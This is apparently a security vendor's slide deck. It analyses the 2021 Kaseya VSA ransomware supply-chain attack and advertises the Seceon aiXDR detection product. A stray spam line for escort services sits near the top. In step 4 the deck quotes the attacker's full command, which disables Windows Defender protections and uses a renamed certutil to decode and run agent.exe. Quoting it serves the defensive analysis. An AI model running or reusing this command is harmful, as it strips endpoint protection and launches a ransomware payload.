Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. Call Us: +1 (978)-923-0040
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
How Seceon could have stopped the Ransomware roll over Kaseya.pptx
1. How Seceon could have stopped
the Ransomware roll over Kaseya.
The attack and ways will keep on changing, one of the most Recent
attack that Kaseya faced is the result of what & where industry is
missing in terms of Cybersecurity.
The attack on Kaseya came in action a few days ago. The sudden
attack emerged in a brutal way infecting around 1500 businesses
worldwide as per the statement by Kaseya’s CEO. The names of
infected companies are not yet out. The observed result of this
attackswas seen with Swedish Coop supermarket which was forced
to close. They are among one of the clients of these MSPs which
were hacked and got infected with 2100 endpoints.
2. A $70 millions ransom was demanded for data backup.
The REvil Ransomware gang is being considered responsible for this
operation. It’s still a mystery whether REvil prepared this attack
themselves or it was from any of their associates.
Kaseya has been completely forced to shut down their cloud
infrastructure to stop malicious updates from spreading and they
completely advised their customer to power down their servers and
that’s created a lot of chaos.
What is VSA, How it got compromised and Ransomware
rolled over it..
VSA is a remote monitoring tool, a kind of remote access tool or RAT
that allows to have the complete access of system or device it’s
installed on, which helps IT Technicians to diagnose and fix problems
remotely. Every organization doesn’t have resources to manage their
infrastructure in house, so they outsource this as a task to MSP
(Managed Service Provider). These MSPs often manage the system of
hundreds of companies simultaneously.
Kaseya is an MSP provider with VSA as a product it has its own prem
version, which is run by the customer in their environment, this is
typically needed by MSPs to manage all their client system and this
was something that was off with Kaseya server that was used to
manage lot of their clients. Having the access of this server will itself
allow it to have the access of all clients associated with it. And this
how it was compromised at initial.
Soon after the attack rolled out all the VSA Server were advised to
close. The operation was huge enough to infect the business, it was
the mass ransomware unlike the ransomware that we know usually
where organizations get infected with Ransomware and all system
they get encrypt and are ask for ransom, here case was quite different
where 100’s of organization around the world got encrypted
simultaneously with the same ransomware campaign which was
tunnelled during the software update in Kaseya, since from the
inception it moved in a supply chain attack.
It was a kind of compromise of Kaseya which was operated on VSA
3. server rather than any of their directory directly that we usually see in
Ransomware. The VSA server was used to ransomware a lot of
organizations in single click and this is what has happened at high
level in it.
How does it propagate?
The scenario is like If there is a device using Kaseya’s agent to
monitor all the device subjected to policy and that is connected to
central server and that server is affected then the entire system
connected with it is at higher risk, and this is how it propagated in the
form of chain attack one after the other and affected 1000s of server.
How did the initial compromise begin and aiXDR
detection?
As VSA server vulnerability was exploited, Seceon aiXDR can detect
and remediate exploited vulnerabilities and zero day attack in very
early stages. Here is the steps by steps analysis:
1.aiXDR monitors all inbound and outbound connections and in this
case aiXDR should have detected a connection from Blacklisted IPs or
from a prohibited country and automatically blocked that connection.
2.Once connection was made it was trying to download/upload
agent.exe on the host , aiXDR can detect data exfiltration and in this
case aiXDR should have blocked that connection so it can not
download the agent.exe or transfers the data to external hosts.
3.Also when the host had agent.exe downloaded, it was doing a
different type of scan to get access to another host – aiXDR should
have detected those scans and automatically quarantined that host so
it can not infect other hosts.
4.Following PowerShell command was launched by the C:Program
Files (x86)Kaseya<ID>AgentMon.exe file of the Kaseya VSA
platform.
“C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul &
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-
MpPreference
4. -DisableRealtimeMonitoring $true
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection
$true -DisableScriptScanning $true
-EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting
Disabled -SubmitSamplesConsent NeverSend & copy /Y
C:WindowsSystem32certutil.exe C:Windowscert.exe & echo
%RANDOM% >> C:Windowscert.exe & C:Windowscert.exe
-decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f
c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe
5.As the AgentMon.exe starts its 1st process to execute the
powershell command the aiXDR would have detected a new process
started as AgentMon.exe from C:Program Files (x86)Kaseya
6.aiXDR detects if any protection service is disabled on the host as
we can see in this case they were trying to disable protection
services
7.aiXDR detects if any process is renamed as Masquerading as we
can see in this case certutil.exe was renamed as cert.exe .
What was the impact of this?
The threat actor was able to manage execution of code that enabled
them to search scripts that linked with Kaseya’s application to pull
out certain procedures or agent updates. It was part of the
functionality of the application to push out procedures through all
managed agents. These agents run on the computer which is
managed by this solution. They simply run the script to all managed
clients and that triggered a file copy and execution of script to all
managed clients. This is how they ended by infecting all these
systems.
There were a couple of steps that were initiated step by step to make
a complete successful attempt for attack but surprisingly it was never
looked at and detected in between.
5. Approach after Infected ?
There are always different indicators left on the system to know how
it’s being compromised or not, here in this case it has been identified
that logs have been cleared at multiple stages. The logs were gone
and other types of logs inside the application database itself were
deleted but still some logs were there to know what VSA server has
put out to manage clients. These logs became a point to bring out the
investigation of how the system was targeted from the VSA server.
Few indications of Being Ransomware.
Ransomware is coming out as a complete business model and the
threat actors are making a lot of money out of it. Below are few
indications mentioned below:
• All files in the system get encrypted and left with a README file
saying about ransom amount. It will change the file extension
which is a clear indication of attack occurrence.
• Some of the files they may or may not get encrypted this happen in
the case where ransomware did not execute successfully i.e it gets
executed partially.
• Provisional execution that disables antivirus functionality such as
Windows defender or other security layers.
Brief About Seceon aiXDR
Seceon aiXDR is highly effective, enriched with capability of
machine learning, AI, Big data, Dynamic threat intel, strong
correlation and in-depth analysis which easily allows to cut &
throw the threat roots at very initial stage.
The solution detects the threat origin whether it’s coming from
Network, application, host or machine learning. It comes out with
one of the most interesting feature to show anything and
everything that was done to make the attack attempt and how
Seceon solution stopped the way in between to make the
6. ...
environment secure with 360 degree Comprehensive visibility,
Proactive Threat Detection, Auto stopping of Threat and breaches
in Real time.
The customer should always make sure that they are not just
taking a solution which is problem specific, the solution should
always be capable of saving the environment from all kinds of
threat and malicious activity whether it is known or unknown.
The Seceon aiXDR is a single all-in-one platform. That helps to
eliminate the use of silos based solutions and delivers the
effective essential result in Comprehensive manner.
Diag. show the Seceon aiXDR approach “Continuous real-time
Monitoring, proactive Detection & auto Stop threats and breaches”
Best Cybersecurity ROI.
7. Contact Us
Address -238 Littleton Road, Suite #206,Westford,
MA 01886, USA
Phone Number - +1 (978)-923-0040
Email Id - sales@seceon.com , info@seceon.com
Website - https://www.seceon.com/
Twitter - https://twitter.com/Seceon_Inc